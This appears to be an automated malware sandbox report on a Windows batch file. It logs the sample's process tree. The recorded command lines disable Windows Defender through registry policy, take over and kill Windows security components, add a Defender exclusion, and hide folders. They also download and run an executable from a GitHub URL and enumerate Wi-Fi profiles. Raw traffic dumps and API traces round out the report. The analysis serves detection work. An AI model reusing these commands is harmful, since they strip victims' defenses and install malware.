                                                                      Data Ascii: u{pm.yFNm;rDXKD[z\EkcXSF|sw0Qb;x%&Iqa6Q5 Gj.=UFu5Fw[USJ%>,gz5q/KaqZzV_z]~B5*(dDvdN~=W/xMD"ih<.MB
                                                                      2024-12-16 16:30:17 UTC9064INData Raw: 5f c5 95 b2 ef 7b 7d a9 14 74 d5 10 5b 17 ba 21 72 08 5a 00 1f 10 63 23 ed 46 3f 19 a4 ea 55 0d 71 37 6b cc a9 2e 5d bf da bc 84 2c ff f9 91 d5 9a 76 6e 78 2e 6e 3b 30 51 d0 52 53 44 0c 94 58 f6 ee 1c 56 f8 d0 91 03 dc a9 59 be f7 18 71 4f 8b e3 ed fb fe 8d 52 35 aa c6 a3 67 e1 a7 a6 75 b2 bb 49 8a 66 f7 b8 f2 8f 9a 7f 29 f5 33 1b 2a 26 41 1f 6f bc 77 df 07 e0 d2 c7 03 29 fb 85 21 a9 b3 1a ec 26 c2 c4 d5 a4 b2 9c 1b 25 7d 91 0e aa 1c 0c 7a 47 23 fb 41 e9 21 66 56 bf 3d 9f 2f 1c 0c 85 c9 e6 b2 52 99 fb ee fb ab 58 df 35 e2 10 70 f1 2b ba ec 2a 58 c2 be 54 ee 7c 87 80 e0 08 fb f4 0e 96 e8 7a 56 2e a7 2e 52 ae bf 58 02 39 58 cc 3d 4b 96 c9 d5 ca 74 fd fc 87 43 c5 18 67 26 5e ba 56 ef 04 07 fe 06 92 08 dd bc b3 6d 0c 25 21 8b 4f c9 88 99 54 df ad 50 ad 22 d1
                                                                      Data Ascii: _{}t[!rZc#F?Uq7k.],vnx.n;0QRSDXVYqOR5guIf)3*&Aow)!&%}zG#A!fV=/RX5p+*XT|zV..RX9X=KtCg&^Vm%!OTP"
                                                                      2024-12-16 16:30:17 UTC16384INData Raw: 52 46 12 1b 4d f8 35 da eb f4 87 21 e7 04 7d 5c 60 b0 da a9 bf aa 0b 40 2b 69 07 82 ca f6 af 8a cd 3c c1 cc aa d6 2e 36 09 d1 db 36 60 ea 30 af e0 08 6e 7a 54 ca 6e 72 5c 4a d0 8d de cf fc 73 09 cd b0 42 b0 43 a9 3e 5f e6 ca 02 4e a6 5b d9 0c c3 74 58 d1 8a 13 0b 6f 5d 71 dd 9d 5a 39 4d 83 d5 76 87 25 93 a0 c3 5f 59 b9 f4 2b 76 4f 29 33 98 02 a2 dd b1 92 5a da f6 34 26 71 e7 0f 0a 78 66 9f 9b 22 fe cd 2a 4a ee 74 44 77 99 3a 59 bf f8 b5 c8 98 2d 3f cf 5e b8 e5 d7 a2 b9 e3 9e d4 d3 92 68 da 92 e5 de 31 17 12 2a 33 a1 f8 41 43 ad 9b c1 30 36 65 c6 1d af 6d d5 d7 fb 5e 12 53 65 f4 16 80 96 34 99 78 e7 ca 6e bd 83 b1 34 4e fa d3 6c df ae f9 95 7d 04 f8 4f a6 86 2c 5e cf a7 25 b1 f9 36 29 de e1 8f 2c f9 80 0a b2 13 d2 96 b3 8f 0a 4e f4 3c 2a a5 21 8c f9 1c de
                                                                      Data Ascii: RFM5!}\`@+i<.66`0nzTnr\JsBC>_N[tXo]qZ9Mv%_Y+vO)3Z4&qxf"*JtDw:Y-?^h1*3AC06em^Se4xn4Nl}O,^%6),N<*!
                                                                      2024-12-16 16:30:17 UTC1512INData Raw: e4 43 7b ed f1 54 64 f6 95 4d 6f dc da 53 d0 9e 70 e6 66 97 e8 4d 07 97 c7 05 a3 c0 49 9d 6e 76 ff bf da fc bb 30 2a e7 dc 59 7b df db 51 66 75 6d ff e1 37 76 9e 25 4e 7e 52 20 4d 03 5f c3 a0 e6 83 c3 1e 40 6b 75 57 aa 1a 5a 36 eb 53 f0 f1 46 17 4f 2f 93 73 c1 d7 6a 8f 0a 9c f3 30 8a 20 34 15 1b a8 b8 6f 74 e7 66 12 d8 17 50 95 48 ca 3c 8d cf ec ea cb 71 5b e5 e4 9c f4 ec 70 75 62 82 43 c8 b4 29 a2 cb fe ca 70 5c 5b 9a cd 36 a7 98 db 8b 73 f0 d0 0e df be e6 c4 f9 ad f4 f6 28 82 21 f9 3d e5 f3 95 8f 3e 94 d9 5c e5 d6 d9 48 39 23 a1 0a f6 d3 70 38 6b 5a f8 e3 43 61 44 23 e2 c3 e5 17 f5 44 a7 04 eb 48 eb b2 2d 44 dc 5a bf ba 96 a9 c4 1d 07 a3 99 5c 6a 4d 64 3b ad 02 1c a6 ab ef e5 89 ef 02 1f 75 ca ce 8a 0a be 99 0e ab ce 66 c9 3c 3a 24 3b 1a 81 01 c7 59 d6
                                                                      Data Ascii: C{TdMoSpfMInv0*Y{Qfum7v%N~R M_@kuWZ6SFO/sj0 4otfPH<q[pubC)p\[6s(!=>\H9#p8kZCaD#DH-DZ\jMd;uf<:$;Y
                                                                      2024-12-16 16:30:17 UTC16384INData Raw: 0a d1 be 88 8a f3 10 3e 04 08 a9 1d 16 b4 06 cd ec 2e c4 db 58 75 d6 01 e9 36 a3 6e 19 20 46 03 c9 15 39 29 85 e4 1a 03 77 79 ce ff 4d 8d 00 9f b7 a8 1c ec b9 ec 68 74 a8 9e a3 be ef 8e f4 4c 3c 38 83 61 d5 0e 92 64 6d 60 7c b9 cd 0c 58 d4 77 9c 27 1c 66 96 1b 52 c0 31 6f 5b 00 9b 96 c0 6a 89 a8 95 35 e9 26 47 20 67 3f 49 20 2c 19 ad f4 25 9d e1 5c 7d ed fa 63 95 87 b9 fa d4 04 15 cd 70 e9 2b 93 ce e9 a7 b4 9e 1b 6f 76 a0 47 9a 1c 5e 07 e8 90 1e ae 70 3a fc f9 e6 0e 13 00 6c 5f a6 8d fa e4 80 b2 02 b7 7e cd 46 d8 64 fb e8 dc 99 16 78 b0 01 a9 e7 8d e7 1c 99 2b 77 ec a4 e7 6a f7 bc d0 6e 4e 51 af 6a fb ae 1f f7 3c 22 a9 29 45 ac 29 e1 de d2 f3 85 a2 0f de a8 59 e0 6e 53 e9 cf 52 5a f8 ef f6 fb 42 93 7f 49 75 44 0d 60 ff ab e7 0c b8 ea 3c 36 ca 3c 66 4a c6
                                                                      Data Ascii: >.Xu6n F9)wyMhtL<8adm`|Xw'fR1o[j5&G g?I ,%\}cp+ovG^p:l_~Fdx+wjnNQj<")E)YnSRZBIuD`<6<fJ
                                                                      2024-12-16 16:30:17 UTC1512INData Raw: 1a b9 5e 0d 9b d1 8f f9 0c 8b ff 56 85 cd 58 e9 5a 6d d9 f5 2e 6e b1 23 28 de 5a a2 b1 6a 7b 2e 4a 71 36 38 65 fd f3 9f d9 be d1 c4 f1 17 7d 90 8f 6d c9 9d 63 0f 57 df 9b c2 5f 43 a5 84 03 68 af 4f f1 51 e4 91 75 4c 3f 07 04 67 54 34 31 4d 9e 11 60 04 b3 6e 97 fd a4 01 c2 c5 83 a5 bf d0 58 95 d6 0e 5f 9e 38 c2 91 06 58 7b 41 d7 61 6e d6 79 11 08 6b a4 a2 cd 0c 6b 65 c0 23 90 18 26 be 56 14 37 6b b0 a9 2b d4 b2 27 5d 1e 92 c2 82 52 bd e2 a2 b4 0d ad ba 94 22 85 45 49 3c 4b 1e 42 c9 71 85 29 cf a4 b0 a9 a2 72 82 d5 dc e0 ee bd 80 5d 89 a8 c8 16 6e 9f 3a 7f eb a4 c3 6d 00 8f ed f3 58 43 78 69 3b 66 82 ce c3 65 e4 4e a8 6a f6 73 93 c7 74 06 bb e9 20 ad 51 70 69 76 3f db 31 05 6b 0b 47 d2 59 81 bd 24 28 11 cd 17 77 56 c3 ff 74 9c 15 9b dc 87 73 33 b1 05 ec cc
                                                                      Data Ascii: ^VXZm.n#(Zj{.Jq68e}mcW_ChOQuL?gT41M`nX_8X{Aanykke#&V7k+']R"EI<KBq)r]n:mXCxi;feNjst Qpiv?1kGY$(wVts3


                                                                      Click to jump to process

                                                                      Click to jump to process

                                                                      Click to dive into process behavior distribution

                                                                      Click to jump to process

                                                                      Target ID:0
                                                                      Start time:11:29:59
                                                                      Start date:16/12/2024
                                                                      Path:C:\Windows\System32\cmd.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\3gJQoqWpxb.bat" "
                                                                      Imagebase:0x7ff6637b0000
                                                                      File size:289'792 bytes
                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:1
                                                                      Start time:11:29:59
                                                                      Start date:16/12/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff72cee0000
                                                                      File size:875'008 bytes
                                                                      MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:2
                                                                      Start time:11:30:00
                                                                      Start date:16/12/2024
                                                                      Path:C:\Windows\System32\cacls.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
                                                                      Imagebase:0x7ff77e590000
                                                                      File size:34'304 bytes
                                                                      MD5 hash:A353590E06C976809F14906746109758
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      Target ID:3
                                                                      Start time:11:30:00
                                                                      Start date:16/12/2024
                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:powershell -window hidden -command ""
                                                                      Imagebase:0x7ff71c820000
                                                                      File size:452'608 bytes
                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:5
                                                                      Start time:11:30:00
                                                                      Start date:16/12/2024
                                                                      Path:C:\Windows\System32\reg.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /f /v "DisableBehaviorMonitoring" /t REG_DWORD /d 1
                                                                      Imagebase:0x7ff68c190000
                                                                      File size:77'312 bytes
                                                                      MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      Target ID:6
                                                                      Start time:11:30:00
                                                                      Start date:16/12/2024
                                                                      Path:C:\Windows\System32\reg.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /f /v "DisableOnAccessProtection" /t REG_DWORD /d 1
                                                                      Imagebase:0x7ff68c190000
                                                                      File size:77'312 bytes
                                                                      MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      Target ID:7
                                                                      Start time:11:30:00
                                                                      Start date:16/12/2024
                                                                      Path:C:\Windows\System32\reg.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /f /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d 1
                                                                      Imagebase:0x7ff68c190000
                                                                      File size:77'312 bytes
                                                                      MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      Target ID:8
                                                                      Start time:11:30:00
                                                                      Start date:16/12/2024
                                                                      Path:C:\Windows\System32\reg.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /f /v "DisableAntiSpyware" /t REG_DWORD /d 1
                                                                      Imagebase:0x7ff68abd0000
                                                                      File size:77'312 bytes
                                                                      MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      Target ID:9
                                                                      Start time:11:30:00
                                                                      Start date:16/12/2024
                                                                      Path:C:\Windows\System32\reg.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /f /v "SecurityHealth"
                                                                      Imagebase:0x7ff68c190000
                                                                      File size:77'312 bytes
                                                                      MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      Target ID:10
                                                                      Start time:11:30:00
                                                                      Start date:16/12/2024
                                                                      Path:C:\Windows\System32\takeown.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:takeown /f "C:\Windows\System32\SecurityHealthService.exe"
                                                                      Imagebase:0x7ff69a820000
                                                                      File size:66'560 bytes
                                                                      MD5 hash:D258A76AA885CBBCAE8C720CD1C284A5
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:11
                                                                      Start time:11:30:00
                                                                      Start date:16/12/2024
                                                                      Path:C:\Windows\System32\icacls.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:icacls "C:\Windows\System32\SecurityHealthService.exe" /grant:r "computer\user":F /c
                                                                      Imagebase:0x7ff7eea40000
                                                                      File size:39'424 bytes
                                                                      MD5 hash:48C87E3B3003A2413D6399EA77707F5D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:12
                                                                      Start time:11:30:00
                                                                      Start date:16/12/2024
                                                                      Path:C:\Windows\System32\takeown.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:takeown /f "C:\Windows\System32\SecurityHealthSystray.exe"
                                                                      Imagebase:0x7ff69a820000
                                                                      File size:66'560 bytes
                                                                      MD5 hash:D258A76AA885CBBCAE8C720CD1C284A5
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:13
                                                                      Start time:11:30:00
                                                                      Start date:16/12/2024
                                                                      Path:C:\Windows\System32\icacls.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:icacls "C:\Windows\System32\SecurityHealthSystray.exe" /grant:r "computer\user":F /c
                                                                      Imagebase:0x7ff7eea40000
                                                                      File size:39'424 bytes
                                                                      MD5 hash:48C87E3B3003A2413D6399EA77707F5D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:14
                                                                      Start time:11:30:01
                                                                      Start date:16/12/2024
                                                                      Path:C:\Windows\System32\taskkill.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:taskkill /IM SecurityHealthSystray.exe /F
                                                                      Imagebase:0x7ff681080000
                                                                      File size:101'376 bytes
                                                                      MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:15
                                                                      Start time:11:30:01
                                                                      Start date:16/12/2024
                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:powershell.exe -command "Add-MpPreference -ExclusionPath "C:\ProgramData\QQQ
                                                                      Imagebase:0x7ff71c820000
                                                                      File size:452'608 bytes
                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:16
                                                                      Start time:11:30:02
                                                                      Start date:16/12/2024
                                                                      Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                      Imagebase:0x7ff724ec0000
                                                                      File size:496'640 bytes
                                                                      MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:false

                                                                      Target ID:17
                                                                      Start time:11:30:02
                                                                      Start date:16/12/2024
                                                                      Path:C:\Windows\System32\timeout.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:timeout.exe /t 10
                                                                      Imagebase:0x7ff729a20000
                                                                      File size:32'768 bytes
                                                                      MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:19
                                                                      Start time:11:30:12
                                                                      Start date:16/12/2024
                                                                      Path:C:\Windows\System32\attrib.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:attrib +h "QQQ" /s /d
                                                                      Imagebase:0x7ff725270000
                                                                      File size:23'040 bytes
                                                                      MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:20
                                                                      Start time:11:30:14
                                                                      Start date:16/12/2024
                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:powershell -Command "Invoke-WebRequest 'https://github.com/pr0niums/Repo/raw/refs/heads/main/NVIDIAS.exe' -OutFile 'NVIDIAS.exe'"
                                                                      Imagebase:0x7ff71c820000
                                                                      File size:452'608 bytes
                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:21
                                                                      Start time:11:30:17
                                                                      Start date:16/12/2024
                                                                      Path:C:\ProgramData\QQQ\NVIDIAS.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:NVIDIAS.exe
                                                                      Imagebase:0xf70000
                                                                      File size:827'904 bytes
                                                                      MD5 hash:2FE8C93D75210E538AEC9062BA29C645
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Antivirus matches:
                                                                      • Detection: 100%, Avira
                                                                      • Detection: 100%, Joe Sandbox ML
                                                                      • Detection: 71%, ReversingLabs
                                                                      Has exited:true

                                                                      Target ID:22
                                                                      Start time:11:30:17
                                                                      Start date:16/12/2024
                                                                      Path:C:\Windows\System32\attrib.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:attrib +h "C:\ProgramData\QQQ\NVIDIAS.exe" /s /d
                                                                      Imagebase:0x7ff725270000
                                                                      File size:23'040 bytes
                                                                      MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:23
                                                                      Start time:11:30:19
                                                                      Start date:16/12/2024
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"cmd.exe" /c tasklist
                                                                      Imagebase:0xfa0000
                                                                      File size:236'544 bytes
                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:24
                                                                      Start time:11:30:19
                                                                      Start date:16/12/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff72cee0000
                                                                      File size:875'008 bytes
                                                                      MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:25
                                                                      Start time:11:30:19
                                                                      Start date:16/12/2024
                                                                      Path:C:\Windows\SysWOW64\tasklist.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:tasklist
                                                                      Imagebase:0xc90000
                                                                      File size:79'360 bytes
                                                                      MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:26
                                                                      Start time:11:30:19
                                                                      Start date:16/12/2024
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"cmd" /C chcp 65001 && netsh wlan show profiles | findstr All
                                                                      Imagebase:0xfa0000
                                                                      File size:236'544 bytes
                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:27
                                                                      Start time:11:30:19
                                                                      Start date:16/12/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff72cee0000
                                                                      File size:875'008 bytes
                                                                      MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:28
                                                                      Start time:11:30:19
                                                                      Start date:16/12/2024
                                                                      Path:C:\Windows\SysWOW64\chcp.com
                                                                      Wow64 process (32bit):true
                                                                      Commandline:chcp 65001
                                                                      Imagebase:0x580000
                                                                      File size:12'800 bytes
                                                                      MD5 hash:41146159AA3D41A92B53ED311EE15693
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:29
                                                                      Start time:11:30:19
                                                                      Start date:16/12/2024
                                                                      Path:C:\Windows\SysWOW64\netsh.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:netsh wlan show profiles
                                                                      Imagebase:0x1490000
                                                                      File size:82'432 bytes
                                                                      MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:30
                                                                      Start time:11:30:19
                                                                      Start date:16/12/2024
                                                                      Path:C:\Windows\SysWOW64\findstr.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:findstr All
                                                                      Imagebase:0x110000
                                                                      File size:29'696 bytes
                                                                      MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:31
                                                                      Start time:11:30:34
                                                                      Start date:16/12/2024
                                                                      Path:C:\Windows\System32\svchost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                      Imagebase:0x7ff68abd0000
                                                                      File size:57'360 bytes
                                                                      MD5 hash:F586835082F632DC8D9404D83BC16316
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:false

                                                                      Target ID:32
                                                                      Start time:11:30:34
                                                                      Start date:16/12/2024
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp6F58.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp6F58.tmp.bat
                                                                      Imagebase:0xfa0000
                                                                      File size:236'544 bytes
                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:33
                                                                      Start time:11:30:34
                                                                      Start date:16/12/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff72cee0000
                                                                      File size:875'008 bytes
                                                                      MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:34
                                                                      Start time:11:30:34
                                                                      Start date:16/12/2024
                                                                      Path:C:\Windows\SysWOW64\chcp.com
                                                                      Wow64 process (32bit):true
                                                                      Commandline:chcp 65001
                                                                      Imagebase:0x580000
                                                                      File size:12'800 bytes
                                                                      MD5 hash:41146159AA3D41A92B53ED311EE15693
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:36
                                                                      Start time:11:30:34
                                                                      Start date:16/12/2024
                                                                      Path:C:\Windows\SysWOW64\taskkill.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:TaskKill /F /IM 716
                                                                      Imagebase:0xf70000
                                                                      File size:74'240 bytes
                                                                      MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:37
                                                                      Start time:11:30:34
                                                                      Start date:16/12/2024
                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 716 -ip 716
                                                                      Imagebase:0x570000
                                                                      File size:482'640 bytes
                                                                      MD5 hash:40A149513D721F096DDF50C04DA2F01F
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:38
                                                                      Start time:11:30:34
                                                                      Start date:16/12/2024
                                                                      Path:C:\Windows\SysWOW64\timeout.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:Timeout /T 2 /Nobreak
                                                                      Imagebase:0xa70000
                                                                      File size:25'088 bytes
                                                                      MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:39
                                                                      Start time:11:30:35
                                                                      Start date:16/12/2024
                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 716 -s 3320
                                                                      Imagebase:0x570000
                                                                      File size:482'640 bytes
                                                                      MD5 hash:40A149513D721F096DDF50C04DA2F01F
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Reset < >

                                                                        Execution Graph

                                                                        Execution Coverage:42.2%
                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                        Signature Coverage:100%
                                                                        Total number of Nodes:24
                                                                        Total number of Limit Nodes:0
                                                                        execution_graph 51853 3534670 51854 35346b8 NtQueryVolumeInformationFile 51853->51854 51856 35346f6 51854->51856 51857 3533ee0 51858 3533f2e NtProtectVirtualMemory 51857->51858 51860 3533f78 51858->51860 51861 3534300 51862 353434e NtOpenFile 51861->51862 51864 3534398 51862->51864 51865 3534580 51866 35345cb NtMapViewOfSection 51865->51866 51868 353462d 51866->51868 51849 35343d8 51850 3534426 NtCreateSection 51849->51850 51852 3534473 51850->51852 51869 3534738 51870 3534780 NtDeviceIoControlFile 51869->51870 51872 35347cd 51870->51872 51873 3533fb8 51874 3534003 NtAllocateVirtualMemory 51873->51874 51876 353404a 51874->51876 51877 3533a28 51878 3533a68 NtClose 51877->51878 51880 3533a99 51878->51880
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1211109726.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_33a0000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ;7X$,U$.s2-$1P#8$5q-[$S
                                                                        • API String ID: 0-2442268200
                                                                        • Opcode ID: 6035e899f176862009daba6fe86d4aad989c2db8892d379ecb1d209da8f17aef
                                                                        • Instruction ID: 6f30b4245e87fd54a065d9ce9c305603a36d1b172366284538d2ccfec2d51c94
                                                                        • Opcode Fuzzy Hash: 6035e899f176862009daba6fe86d4aad989c2db8892d379ecb1d209da8f17aef
